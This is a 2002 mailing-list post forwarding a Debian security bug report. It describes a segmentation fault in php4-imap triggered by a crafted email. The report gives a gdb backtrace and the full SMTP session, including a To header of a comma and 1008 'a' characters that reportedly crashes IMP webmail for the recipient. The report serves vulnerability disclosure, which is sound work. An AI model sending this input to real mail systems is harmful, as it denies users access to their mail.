[dev] Reproductible Segmentation fault php4-imap

Jean Charles Delepine delepine@u-picardie.fr
Thu Oct 10 10:38:29 PDT 2002 

Hello,

You should have a look to
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=163954&repeatmerged=yes

A bug in php4-imap which can render imp and imp3 unusable for
arbitrary users by sending them a particular email.

The debian's bug report (for those who don't like web) :

From: Jean Charles Delepine <delepine@u-picardie.fr>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: php4-imap: Reproductible Segmentation fault in IMP whith php4-imap
X-Mailer: reportbug 1.50
Date: Wed, 09 Oct 2002 16:25:44 +0200
Message-Id: <20021009142544.C8DE18C2F@gip2.u-picardie.fr>
Delivered-To: submit@bugs.debian.org

Package: php4-imap
Version: 4:4.1.2-5
Severity: important
Tags: security

Hello,

By sending a email I get a segfault in php4-imap :

(gdb) continue
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x404016bf in add_property_string_ex () from /usr/lib/apache/1.3/libphp4.so
(gdb) bt
#0  0x404016bf in add_property_string_ex () from /usr/lib/apache/1.3/libphp4.so
#1  0x4458c663 in zif_imap_mime_header_decode ()
   from /usr/lib/php4/20010901/imap.so
#2  0xf6a0401f in ?? ()
Cannot access memory at address 0x1e484014

The mail is (sorry for the long line) :

mail from: <machin@domain.org>
250 Ok
rcpt to: <target@domain.net>
250 Ok
data
354 End data with <CR><LF>.<CR><LF>
To: ",aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaa"@u-picardie.fr

.
250 Ok: queued as F1C607DEC

The ',' is mandatory, can be anywhere in the string. There's 1008 'a'.

This segfault breaks IMP (stable an unstable versions) and get them 
unusable.

-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux gip2 2.4.19-pre5 #6 SMP Fri Apr 5 09:50:06 CEST 2002 i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages php4-imap depends on:
ii  libc6                         2.2.5-11.2 GNU C Library: Shared libraries an
ii  php4 [zendapi-20010901]       4:4.1.2-5  A server-side, HTML-embedded scrip
ii  php4-cgi [zendapi-20010901]   4:4.1.2-5  A server-side, HTML-embedded scrip

Sincerly,
            Jean Charles
-- 
Jean Charles Delépine - Équipe Réseaux Télécoms - Université de Picardie

More information about the dev mailing list